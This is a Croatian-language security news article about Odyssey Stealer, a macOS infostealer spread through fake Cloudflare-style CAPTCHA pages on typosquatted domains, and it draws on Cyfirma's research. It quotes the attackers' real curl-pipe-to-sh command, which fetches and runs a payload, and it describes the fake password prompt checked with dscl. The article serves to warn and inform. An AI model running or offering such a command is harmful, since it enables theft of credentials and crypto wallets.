Nova sofisticirana kampanja zlonamjernog softvera usmjerena na korisnike macOS-a pojavila se, koristeći obmanjujuće “Clickfix” taktike za distribuciju zlonamjernih AppleScriptova dizajniranih za prikupljanje osjetljivih korisničkih akreditacija i financijskih podataka. Kampanja iskorištava domene koji se nepravilnim pisanjem podudaraju s legitimnim financijskim platformama i web stranicama Apple App Storea, stvarajući uvjerljivu fasadu koja korisnike navodi na izvršavanje opasnih naredbi na svojim sistemima. Napad započinje kada korisnici nenamjerno posjete zlonamjerne domene koje prikazuju lažne upite za CAPTCHA slične Cloudflareu. Ove naizgled legitimne stranice za provjeru upućuju korisnike macOS-a da kopiraju i zalijepe Base64 kodirane naredbe u svoje terminalske aplikacije kako bi dokazali da nisu roboti. Nakon izvršenja, ove naredbe pokreću sveobuhvatnu operaciju krađe podataka koja cilja na akreditacije preglednika, kriptovalute novčanike i osjetljive osobne podatke pohranjene u više aplikacija. Istraživači Cyfirme identificirali su ovaj zlonamjerni softver kao Odyssey Stealer, preimenovanu verziju prethodno poznatog Poseidon Stealera, koji je sam nastao kao fork AMOS Stealera. Tim za istraživanje otkrio je više kontrolnih i zapovjednih panela povezanih s ovom aktivnošću, s infrastrukturom uglavnom smještenom u Rusiji. Zlonamjerni softver pokazuje jasnu sklonost ciljanju korisnika u zapadnim zemljama, posebno Sjedinjenim Američkim Državama i Europskoj uniji, dok istovremeno upadljivo izbjegava žrtve u zemljama Zajednice neovisnih država. Odyssey Stealer predstavlja zabrinjavajući napredak u zlonamjernom softveru usmjerenom na macOS, kombinirajući taktike socijalnog inženjeringa sa sofisticiranim tehničkim mogućnostima. Za razliku od tradicionalnog zlonamjernog softvera koji se oslanja na ranjivosti softvera, ova kampanja iskorištava ljudsku psihologiju predstavljajući korisnicima poznate sigurnosne upite koji se čine kao rutinske procedure provjere. Napadači su pažljivo izradili svoje distribucijske web stranice tako da odražavaju povjerljive platforme, čineći detekciju posebno izazovnom za nesuđene korisnike.
Mehanizam infekcije zlonamjernim softverom oslanja se na višestupanjski proces koji započinje nepravilnim pisanjem domena i završava potpunom kompromitacijom sistema. Kada korisnici posjete zlonamjerne domene, nailaze na profesionalno dizajnirane stranice koje repliciraju izgled legitimnih sustava provjere CAPTCHA. Lažni upit prikazuje upute za korisnike macOS-a da izvrše naredbu koja izgleda ovako: `curl -s http://odyssey1.to:3333/d?u=October | sh`. Ova naredba preuzima i izvršava AppleScript sa servera napadača za kontrolu i zapovijedanje. Skript koristi alfanumeričko zamagljivanje za skrivanje naziva funkcija, iako analiza otkriva njegovu pravu svrhu. Nakon izvršenja, zlonamjerni softver stvara privremenu direktorijsku strukturu pomoću naredbe `mkdir`, posebno uspostavljajući `/tmp/lovemrtrump` kao svoju operativnu bazu. AppleScript zatim prikazuje uvjerljiv upit za autentifikaciju dizajniran za hvatanje korisničke sistemske lozinke. Kako bi potajno provjerio ukradene akreditacije, koristi macOS `dscl` naredbu s parametrom `authonly`, osiguravajući da proces provjere ostane skriven od korisnika. Ova tehnika omogućuje zlonamjernom softveru da potvrdi valjanost lozinke bez pokretanja sistemskih upozorenja ili sumnji korisnika, demonstrirajući duboko razumijevanje napadača sigurnosnih mehanizama macOS-a.
Ovo upozorenje detaljnije objašnjava novu kampanju zlonamjernog softvera koja cilja na korisnike macOS-a, objavljeno od strane Cyfirma istraživačkog tima na njihovom blogu i putem mrežnih platformi za dijeljenje informacija o sigurnosti. Upozorenje povezuje ovu aktivnost s konkretnim primjerima sofisticiranih metoda prevare. Prevaranti uspijevaju namamiti žrtve kreiranjem web stranica koje nalikuju legitimnim portalima za provjeru, kao što su one povezane s Cloudflareom ili financijskim institucijama. Korisnicima se prikazuje lažni sigurnosni upit koji ih navodi da kopiraju i zalijepe niz kodova u svoj terminal. Ova metoda, poznata kao “Clickfix”, koristi se kako bi se zaobišlo uobičajeno nepovjerenje korisnika prema preuzimanju datoteka, umjesto toga ih uvjeravajući da je izvršavanje naredbe nužan korak u procesu provjere autentičnosti. Na taj način, napadači ih navode na izvršavanje zlonamjernih AppleScriptova koji potom mogu ukrasti osjetljive podatke poput lozinki i kriptovalute novčanika. Primjer prikazuje kako je napad izveden putem domena koji su namjerno nepravilno napisani kako bi se predstavili kao legitimni, što je prevaru učinilo uvjerljivijom za korisnike koji nisu budni. Cijeli proces, od posjeta lažnoj stranici do izvršavanja zlonamjerne naredbe, osmišljen je kako bi iskoristio ljudsku psihologiju, čineći ga učinkovitim alatom u arsenalu kibernetičkih kriminalaca.